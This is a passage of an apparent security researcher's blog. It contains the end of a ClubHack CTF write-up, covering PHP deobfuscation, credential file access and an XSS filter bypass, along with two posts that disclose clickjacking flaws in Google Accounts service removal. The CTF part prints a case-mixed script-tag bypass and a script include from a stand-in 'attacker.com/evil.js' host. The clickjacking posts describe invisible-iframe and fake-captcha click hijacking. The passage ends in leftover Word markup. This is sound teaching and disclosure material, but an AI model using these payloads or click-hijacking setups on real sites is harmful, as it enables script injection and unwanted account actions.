Hmm!! Now things are pretty clear. Identify the file to download, generate SHA1 hash of it using execute.php and then use download.php to download it.<br />
<br />
Let’s download UserLogin.php as our goal is to get logged in. Following URL used to download it:<br />
<div style="background-color: #999999;">http://183.82.241.134/ClubHack/download.php?f=UserLogin.php&oa=36ea1d4979568e6804b61b846ed855fe5d6f626c</div><br />
Now only thing left was to analyze UserLogin.php, check how it’s authenticating a user and get logged in. But this is CTF and it won’t be that easy.<br />
<br />
UserLogin.php was obfuscated. Quick Google search revealed that PHP obfuscator at <a href="http://www.fopo.com.ar/">http://www.fopo.com.ar</a> was used. Now we need to de-obfuscate it. Google search didn’t revealed any online/offline tool for this obfuscation. So only option was left to switch to Manual Mode.<br />
<br />
This is how UserLogin.php file looked:<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-Uou2C4hQ-tk/TvAnq49o6HI/AAAAAAAAAcY/-vWXg01RwJ0/s1600/UserLogin-php.JPG" imageanchor="1"><img border="0" height="291" src="http://2.bp.blogspot.com/-Uou2C4hQ-tk/TvAnq49o6HI/AAAAAAAAAcY/-vWXg01RwJ0/s400/UserLogin-php.JPG" width="400" /></a></div><br />
I used local PHP server to obfuscate it. First step was to change <b>eval()</b> to <b>echo()</b> which will give us back the code to analyze further. The output looks like this:<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-eUaJFOhyyIc/TvAn_IeSWqI/AAAAAAAAAck/fBl90-U-qes/s1600/UserLogin-php1.JPG" imageanchor="1"><img border="0" height="198" src="http://1.bp.blogspot.com/-eUaJFOhyyIc/TvAn_IeSWqI/AAAAAAAAAck/fBl90-U-qes/s400/UserLogin-php1.JPG" width="400" /></a></div><br />
It looks like arbitrary strings used to construct variable and function names. The only way to know it was to echo back the arbitrary string values and replacing it with original strings in code. The input file looks like this:<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-HL8qfleN67s/TvAoOWNuY5I/AAAAAAAAAcw/DYcGkjB9qaE/s1600/UserLogin-php2.JPG" imageanchor="1"><img border="0" height="243" src="http://2.bp.blogspot.com/-HL8qfleN67s/TvAoOWNuY5I/AAAAAAAAAcw/DYcGkjB9qaE/s400/UserLogin-php2.JPG" width="400" /></a></div><br />
And output of this is:<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-WHJ9RC7OdNE/TvAob6syQQI/AAAAAAAAAc8/2JODtTzy180/s1600/UserLogin-php3.JPG" imageanchor="1"><img border="0" height="185" src="http://4.bp.blogspot.com/-WHJ9RC7OdNE/TvAob6syQQI/AAAAAAAAAc8/2JODtTzy180/s400/UserLogin-php3.JPG" width="400" /></a></div><br />
The final code after replacing the names looks like this:<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-wIOHJkVR1gY/TvAomfwVoXI/AAAAAAAAAdI/w4-lGDqEpYY/s1600/UserLogin-php4.JPG" imageanchor="1"><img border="0" height="77" src="http://1.bp.blogspot.com/-wIOHJkVR1gY/TvAomfwVoXI/AAAAAAAAAdI/w4-lGDqEpYY/s400/UserLogin-php4.JPG" width="400" /></a></div><br />
Now it’s sort of readable. This code again has one eval() which is doing str_rot13, base64_decode & gzinflate actions on some input string.<br />
Let’s echo it instead of eval.<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-3kqIRiOdOFc/TvAo3s6s1RI/AAAAAAAAAdU/vkiBtqj5fGE/s1600/UserLogin-php5.JPG" imageanchor="1"><img border="0" height="80" src="http://1.bp.blogspot.com/-3kqIRiOdOFc/TvAo3s6s1RI/AAAAAAAAAdU/vkiBtqj5fGE/s400/UserLogin-php5.JPG" width="400" /></a></div><br />
Now it’s much clear. The PHP code is taking POST parameters which are username & password. Then checking it against the file content. So the file “\x6d\171\x68\141\x73\150\x65\163\x61\162\x65\156\x6f\164\x68\145\x72\145\x2e\164\x78\164” seems to be having credentials. Echo this string to get exact filename.<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-2aDcTROLeI8/TvApGWoHbaI/AAAAAAAAAdg/04gff6cXshw/s1600/UserLogin-php6.JPG" imageanchor="1"><img border="0" height="80" src="http://3.bp.blogspot.com/-2aDcTROLeI8/TvApGWoHbaI/AAAAAAAAAdg/04gff6cXshw/s400/UserLogin-php6.JPG" width="400" /></a></div><br />
Now let’s get this file. <br />
<br />
Sometimes when you work too much, your brain stops thinking in right direction and you keep trying to the wrong way. I was trying to download this file with download.php which every time says “Invalid file type”. The error keeps me thinking of bypassing content type to get this file. As it’s text file we can access it directly browsing to it.<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-rsor-8vr9_I/TvApQw54I5I/AAAAAAAAAds/8io3OFYavxw/s1600/myhashesnothere-txt.JPG" imageanchor="1"><img border="0" height="67" src="http://2.bp.blogspot.com/-rsor-8vr9_I/TvApQw54I5I/AAAAAAAAAds/8io3OFYavxw/s400/myhashesnothere-txt.JPG" width="400" /></a></div><br />
Wow, now we have credentials. Password is hashed so tampering POST request has helped to login.<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-j7KOryYRKak/TvApjQC7efI/AAAAAAAAAd4/uVhDdMyvvH0/s1600/Final-php.JPG" imageanchor="1"><img border="0" height="170" src="http://3.bp.blogspot.com/-j7KOryYRKak/TvApjQC7efI/AAAAAAAAAd4/uVhDdMyvvH0/s400/Final-php.JPG" width="400" /></a></div><br />
Looks like final stage (Final.php). This is a form which looks like email client and used to send a vulnerability report to Security & Management team.<br />
<br />
This page has hardcoded email addresses in “sendtomails” hidden parameter and the subject also hardcoded with “Security Updates”.<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-Qv_anMvGsdI/TvAp6v7w39I/AAAAAAAAAeE/c5dNzXGQNYY/s1600/Final1.JPG" imageanchor="1"><img border="0" height="107" src="http://1.bp.blogspot.com/-Qv_anMvGsdI/TvAp6v7w39I/AAAAAAAAAeE/c5dNzXGQNYY/s400/Final1.JPG" width="400" /></a></div><br />
Both these parameters are validated at server side. Any tampering with these parameters will results in error.<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-MFCTUQR6B5k/TvAqVKl6S-I/AAAAAAAAAeQ/fn7qT5r9IMo/s1600/Final2.JPG" imageanchor="1"><img border="0" height="71" src="http://1.bp.blogspot.com/-MFCTUQR6B5k/TvAqVKl6S-I/AAAAAAAAAeQ/fn7qT5r9IMo/s400/Final2.JPG" width="400" /></a></div><br />
Only Message field is left for user. All the server side attacks like SQL injections, Command/Code injections were not working here. I tried for 2 days at this level. There were no clues available. I felt like lost.<br />
<br />
The ClubHack tweeted about 2 flag submissions.<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-FLhUQKOIGxc/TvAqsSadHCI/AAAAAAAAAeg/YH8E75MrYIg/s1600/twitter1.jpg" imageanchor="1"><img border="0" height="72" src="http://1.bp.blogspot.com/-FLhUQKOIGxc/TvAqsSadHCI/AAAAAAAAAeg/YH8E75MrYIg/s400/twitter1.jpg" width="400" /></a></div><br />
It’s now confirmed that there is a way to get out of this Final.php page. Somehow I couldn’t found it yet. One day before the conference, ClubHack released a hint via twitter.<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-jbCyhshtJmQ/TvAq4v5BHaI/AAAAAAAAAeo/5jkdCtnAkxI/s1600/twitter2.jpg" imageanchor="1"><img border="0" height="71" src="http://2.bp.blogspot.com/-jbCyhshtJmQ/TvAq4v5BHaI/AAAAAAAAAeo/5jkdCtnAkxI/s400/twitter2.jpg" width="400" /></a></div><br />
Now things get clearer. ClubHack was talking about cookies which related to XSS. <a href="https://www.owasp.org/index.php/Cross-site_Scripting_%28XSS%29">Cross-site scripting</a> is client side bug and never heard being used in CTF where mostly server side bugs are exploited to get flag.<br />
<br />
Finally taking the hint as clue, I proceed with XSS flaw and tried to exploit it. <br />
At first, script & img tags was filtered in Message parameter but rest tags were allowed. Using a href tag with event handler to execute javascript, I was able to access cookies but was not enough to pass the level.<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-j9XIb06alqE/TvArD0CVv3I/AAAAAAAAAe0/4690AkuQ31Q/s1600/Final3.JPG" imageanchor="1"><img border="0" height="147" src="http://3.bp.blogspot.com/-j9XIb06alqE/TvArD0CVv3I/AAAAAAAAAe0/4690AkuQ31Q/s400/Final3.JPG" width="400" /></a></div><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-lfs6NwC-woU/TvArMsplwpI/AAAAAAAAAfA/Q-OCVEu8gZY/s1600/Final4.JPG" imageanchor="1"><img border="0" height="95" src="http://2.bp.blogspot.com/-lfs6NwC-woU/TvArMsplwpI/AAAAAAAAAfA/Q-OCVEu8gZY/s400/Final4.JPG" width="400" /></a></div><br />
It seems like alerting cookie is not going to help. So next step to include malicious javascript. As script tags was not working, I tried to use bypasses for it. The basic one is to use uppercase-lowercase combination of letters: <span style="background-color: #999999;"><ScRiPt>alert(1)</script></span><br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-9QCwi52HX4M/TvAruOzKAwI/AAAAAAAAAfM/jc6RNFBQIuo/s1600/Final5.JPG" imageanchor="1"><img border="0" height="145" src="http://1.bp.blogspot.com/-9QCwi52HX4M/TvAruOzKAwI/AAAAAAAAAfM/jc6RNFBQIuo/s400/Final5.JPG" width="400" /></a></div><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-qrpFdVPCI7A/TvArzkr0udI/AAAAAAAAAfY/ZKh0nI-I2OQ/s1600/Final6.JPG" imageanchor="1"><img border="0" height="113" src="http://1.bp.blogspot.com/-qrpFdVPCI7A/TvArzkr0udI/AAAAAAAAAfY/ZKh0nI-I2OQ/s400/Final6.JPG" width="400" /></a></div><br />
Next is to include malicious javascript. In this case, I included a demo script as:<br />
<script src="%E2%80%9Dhttp://attacker.com/evil.js%E2%80%9D">
</script><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-cWKtbNXVsG8/TvAr-Y0AltI/AAAAAAAAAfk/MyItGTqmuvI/s1600/Final7.JPG" imageanchor="1"><img border="0" height="153" src="http://4.bp.blogspot.com/-cWKtbNXVsG8/TvAr-Y0AltI/AAAAAAAAAfk/MyItGTqmuvI/s400/Final7.JPG" width="400" /></a></div><br />
It worked and gives away flag string and link to submit the flag.<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-Z05ZokviIzE/TvAsFMRelAI/AAAAAAAAAfw/CbWqXM-K86Y/s1600/Final8.JPG" imageanchor="1"><img border="0" height="142" src="http://1.bp.blogspot.com/-Z05ZokviIzE/TvAsFMRelAI/AAAAAAAAAfw/CbWqXM-K86Y/s400/Final8.JPG" width="400" /></a></div><br />
ClubHack has replied one of my tweets after the flag submission.<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-seQmhA5zikA/TvAsO90hDhI/AAAAAAAAAf8/tiy1FZmu6cM/s1600/twitter3.png" imageanchor="1"><img border="0" height="148" src="http://3.bp.blogspot.com/-seQmhA5zikA/TvAsO90hDhI/AAAAAAAAAf8/tiy1FZmu6cM/s320/twitter3.png" width="320" /></a></div><br />
After 3 days of efforts, it paid well. I enjoyed ClubHack event. Thanks to ClubHack team & NII for creating this CTF.<br />
<br />
I hope you enjoyed this post. Any comments, suggestions are welcome.</div>AMol NAikhttp://www.blogger.com/profile/03701068634043898539noreply@blogger.com3tag:blogger.com,1999:blog-1544325078740292092.post-41209127855619008342011-12-13T20:56:00.000-08:002011-12-13T20:56:11.474-08:00Presentation: Make Profit with UI-Redressing AttacksSlides from Null Pune Chapter Oct-2011 meet presentation. <br />
<br />
<div style="width:425px" id="__ss_10579166"><strong style="display:block;margin:12px 0 4px"><a href="http://www.slideshare.net/null0x00/make-profit-with-uiredressing-attacks" title="Make profit with UI-Redressing attacks." target="_blank">Make profit with UI-Redressing attacks.</a></strong> <iframe src="http://www.slideshare.net/slideshow/embed_code/10579166" width="425" height="355" frameborder="0" marginwidth="0" marginheight="0" scrolling="no"></iframe> <div style="padding:5px 0 12px">View more <a href="http://www.slideshare.net/" target="_blank">presentations</a> from <a href="http://www.slideshare.net/null0x00" target="_blank">n|u - The Open Security Community</a> </div></div>AMol NAikhttp://www.blogger.com/profile/03701068634043898539noreply@blogger.com3tag:blogger.com,1999:blog-1544325078740292092.post-58738063679403225002011-09-14T23:03:00.000-07:002011-09-14T23:03:01.663-07:00Hijacking 2 clicks in Google Accounts<div dir="ltr" style="text-align: left;" trbidi="on">This vulnerability was the same as my <a href="http://amolnaik4.blogspot.com/2011/09/remove-google-books-with-clickjacking.html">previous post</a> but more challenging in terms of exploitation. In this, attacker needs to hijack 2 user clicks to complete the desired action.<br />
<br />
It starts with <a href="https://accounts.google.com/EditServices">Google Products</a> page where you can remove listed service from Google Accounts.<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-T9p450Di680/TnGSM7DgSwI/AAAAAAAAAZc/H6B97wIFapo/s1600/poc6.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="171" src="http://4.bp.blogspot.com/-T9p450Di680/TnGSM7DgSwI/AAAAAAAAAZc/H6B97wIFapo/s400/poc6.JPG" width="400" /></a></div><br />
Once user decided to remove any service, for ex. Google Health, the user is presented with following page.<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-Q46juPxCjiY/TnGSJvUbOPI/AAAAAAAAAZI/F032YtmmWnE/s1600/poc1.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="181" src="http://4.bp.blogspot.com/-Q46juPxCjiY/TnGSJvUbOPI/AAAAAAAAAZI/F032YtmmWnE/s400/poc1.JPG" width="400" /></a></div><br />
To remove service, user first needs to click the checkbox. After this only the “Remove Google Health” button will be active which when clicked will remove respective service from Google Account.<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-SB_hzL5evNM/TnGSKek15RI/AAAAAAAAAZM/QmMvcXFcTdc/s1600/poc2.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="178" src="http://1.bp.blogspot.com/-SB_hzL5evNM/TnGSKek15RI/AAAAAAAAAZM/QmMvcXFcTdc/s400/poc2.JPG" width="400" /></a></div><br />
To exploit this, I used “Fake Captcha” technique which will successfully hijack required 2 clicks and will remove targeted service. Here is how the attack page looks like.<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-aEasyGsLgp8/TnGSK6akTmI/AAAAAAAAAZQ/9RWnz8MIii0/s1600/poc3.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="151" src="http://3.bp.blogspot.com/-aEasyGsLgp8/TnGSK6akTmI/AAAAAAAAAZQ/9RWnz8MIii0/s400/poc3.JPG" width="400" /></a></div><br />
This page has an invisible iframe which renders remove service page from Google Accounts. The correct answer, in this case ‘30’, is placed over the checkbox from vulnerable page & ‘Submit Answer’ on ‘Remove Google Health’ button.<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-MdhfCOEDrdI/TnGSLpkxSUI/AAAAAAAAAZU/NRxHUli3ZOY/s1600/poc4.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="165" src="http://3.bp.blogspot.com/-MdhfCOEDrdI/TnGSLpkxSUI/AAAAAAAAAZU/NRxHUli3ZOY/s400/poc4.JPG" width="400" /></a></div><br />
When an authenticated user clicks on right answer for the provided arithmetic operation, he/she actually clicking the checkbox which enables “Remove Google Health” button.<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-uQQ72px_FEo/TnGSMIQe8ZI/AAAAAAAAAZY/TBKTlYZMiLw/s1600/poc5.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="156" src="http://2.bp.blogspot.com/-uQQ72px_FEo/TnGSMIQe8ZI/AAAAAAAAAZY/TBKTlYZMiLw/s400/poc5.JPG" width="400" /></a></div><br />
Now he/she need to complete the process by submitting the answer. Once clicked on “Submit Answer” button, the targeted service will be removed from his/her Google Accounts.<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-uN92bvtiXcc/TnGSJKL2duI/AAAAAAAAAZE/A6KaPDm0M2I/s1600/poc7.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="160" src="http://1.bp.blogspot.com/-uN92bvtiXcc/TnGSJKL2duI/AAAAAAAAAZE/A6KaPDm0M2I/s400/poc7.JPG" width="400" /></a></div><br />
<a href="https://accounts.google.com/DeleteService?service=health">Remove Google Heath</a>, <a href="https://accounts.google.com/DeleteService?service=hist">Remove Google Web History</a> and <a href="https://accounts.google.com/DeleteService?service=orkut">Remove Orkut</a> were vulnerable to this attack.<br />
<br />
Google was very quick to patch this vulnerability.<br />
<br />
Hope you enjoyed reading this. Suggestions, comments are welcome.</div>AMol NAikhttp://www.blogger.com/profile/03701068634043898539noreply@blogger.com2tag:blogger.com,1999:blog-1544325078740292092.post-40635643192144209152011-09-13T00:11:00.000-07:002011-09-13T02:34:25.067-07:00Remove Google Books with Clickjacking<div dir="ltr" style="text-align: left;" trbidi="on">
Google Accounts has options to remove <a href="https://accounts.google.com/EditServices">Google Products</a>. One of them was to <a href="http://www.google.com/books?op=purge&continue=http://www.google.com/accounts/EditServices">remove Google Books</a> permanently.<br />
<br />
<div class="separator" style="clear: both; text-align: left;">
<a href="http://2.bp.blogspot.com/-HWSQUqmSMlM/Tm7-AP9iADI/AAAAAAAAAY0/SF2GaAgChMI/s1600/poc4.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="259" src="http://2.bp.blogspot.com/-HWSQUqmSMlM/Tm7-AP9iADI/AAAAAAAAAY0/SF2GaAgChMI/s640/poc4.JPG" width="640" /></a></div>
<br />
This action was well protected for <a href="https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29">CSRF</a> using tokens. However it was possible to render this page in an iframe due to absence of clickjacking protections such as <a href="https://www.owasp.org/index.php/Clickjacking#Best-for-now_implementation">Frame Bursting Code</a> or <a href="https://developer.mozilla.org/en/The_X-FRAME-OPTIONS_response_header">X-FRAME-OPTIONS </a>header.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-YYzC_YsEMA8/Tm798wQS2UI/AAAAAAAAAYo/nVuer7PxX0E/s1600/poc1.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-YYzC_YsEMA8/Tm798wQS2UI/AAAAAAAAAYo/nVuer7PxX0E/s1600/poc1.JPG" /></a></div>
<br />
To carry a successful clickjacking attack, an attacker needs to place a dummy button on top of “<b>OK</b>” button from vulnerable page.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-MUQgUATDPLI/Tm79_CkNNAI/AAAAAAAAAYs/1Ldc83u0KKk/s1600/poc2.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-MUQgUATDPLI/Tm79_CkNNAI/AAAAAAAAAYs/1Ldc83u0KKk/s1600/poc2.JPG" /></a></div>
<br />
The page presented to victim looks like this.<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-WvKX3h6Udbc/Tm79_SFIq2I/AAAAAAAAAYw/WA_ZZH0IWnk/s1600/poc3.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-WvKX3h6Udbc/Tm79_SFIq2I/AAAAAAAAAYw/WA_ZZH0IWnk/s1600/poc3.JPG" /></a></div>
<br />
When an authenticated user browses to the above page hosted on attacker site, the invisible iframe will be loaded with remove Google Books page having proper anti-CSRF tokens in place. When user clicks on “<b>Click</b>” button, he/she actually clicks on “<b>OK</b>” button on vulnerable page and all the reviews, ratings and libraries of that user will be deleted.<br />
<br />
This attack needs only one click and works like <a href="https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29">CSRF</a>.<br />
<br />
<b>Edit:</b> Here is the demo code used for this exploit:<br />
<!--[if gte mso 9]><xml>
<w:WordDocument>
<w:View>Normal</w:View>
<w:Zoom>0</w:Zoom>
<w:TrackMoves/>
<w:TrackFormatting/>
<w:PunctuationKerning/>
<w:ValidateAgainstSchemas/>
<w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid>
<w:IgnoreMixedContent>false</w:IgnoreMixedContent>
<w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText>
<w:DoNotPromoteQF/>
<w:LidThemeOther>EN-US</w:LidThemeOther>
<w:LidThemeAsian>X-NONE</w:LidThemeAsian>
<w:LidThemeComplexScript>X-NONE</w:LidThemeComplexScript>
<w:Compatibility>
<w:BreakWrappedTables/>
<w:SnapToGridInCell/>
<w:WrapTextWithPunct/>
<w:UseAsianBreakRules/>
<w:DontGrowAutofit/>
<w:SplitPgBreakAndParaMark/>
<w:DontVertAlignCellWithSp/>
<w:DontBreakConstrainedForcedTables/>
<w:DontVertAlignInTxbx/>
<w:Word11KerningPairs/>
<w:CachedColBalance/>
</w:Compatibility>
<w:BrowserLevel>MicrosoftInternetExplorer4</w:BrowserLevel>
<m:mathPr>
<m:mathFont m:val="Cambria Math"/>
<m:brkBin m:val="before"/>
<m:brkBinSub m:val="--"/>
<m:smallFrac m:val="off"/>
<m:dispDef/>
<m:lMargin m:val="0"/>
<m:rMargin m:val="0"/>
<m:defJc m:val="centerGroup"/>
<m:wrapIndent m:val="1440"/>
<m:intLim m:val="subSup"/>
<m:naryLim m:val="undOvr"/>
</m:mathPr></w:WordDocument>
</xml><![endif]--><!--[if gte mso 9]><xml>
<w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true"
DefSemiHidden="true" DefQFormat="false" DefPriority="99"
LatentStyleCount="267">
<w:LsdException Locked="false" Priority="0" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Normal"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="heading 1"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 2"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 3"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 4"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 5"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 6"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 7"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 8"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 9"/>
<w:LsdException Locked="false" Priority="39" Name="toc 1"/>
<w:LsdException Locked="false" Priority="39" Name="toc 2"/>
<w:LsdException Locked="false" Priority="39" Name="toc 3"/>
<w:LsdException Locked="false" Priority="39" Name="toc 4"/>
<w:LsdException Locked="false" Priority="39" Name="toc 5"/>
<w:LsdException Locked="false" Priority="39" Name="toc 6"/>
<w:LsdException Locked="false" Priority="39" Name="toc 7"/>
<w:LsdException Locked="false" Priority="39" Name="toc 8"/>
<w:LsdException Locked="false" Priority="39" Name="toc 9"/>
<w:LsdException Locked="false" Priority="35" QFormat="true" Name="caption"/>
<w:LsdException Locked="false" Priority="10" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Title"/>
<w:LsdException Locked="false" Priority="1" Name="Default Paragraph Font"/>
<w:LsdException Locked="false" Priority="11" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtitle"/>
<w:LsdException Locked="false" Priority="22" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Strong"/>
<w:LsdException Locked="false" Priority="20" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Emphasis"/>
<w:LsdException Locked="false" Priority="59" SemiHidden="false"
UnhideWhenUsed="false" Name="Table Grid"/>
<w:LsdException Locked="false" UnhideWhenUsed="false" Name="Placeholder Text"/>
<w:LsdException Locked="false" Priority="1" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="No Spacing"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 1"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 1"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 1"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 1"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 1"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 1"/>
<w:LsdException Locked="false" UnhideWhenUsed="false" Name="Revision"/>
<w:LsdException Locked="false" Priority="34" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="List Paragraph"/>
<w:LsdException Locked="false" Priority="29" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Quote"/>
<w:LsdException Locked="false" Priority="30" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Quote"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 1"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 1"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 1"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 1"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 1"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 1"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 1"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 1"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 2"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 2"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 2"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 2"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 2"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 2"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 2"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 2"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 2"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 2"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 2"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 2"/>
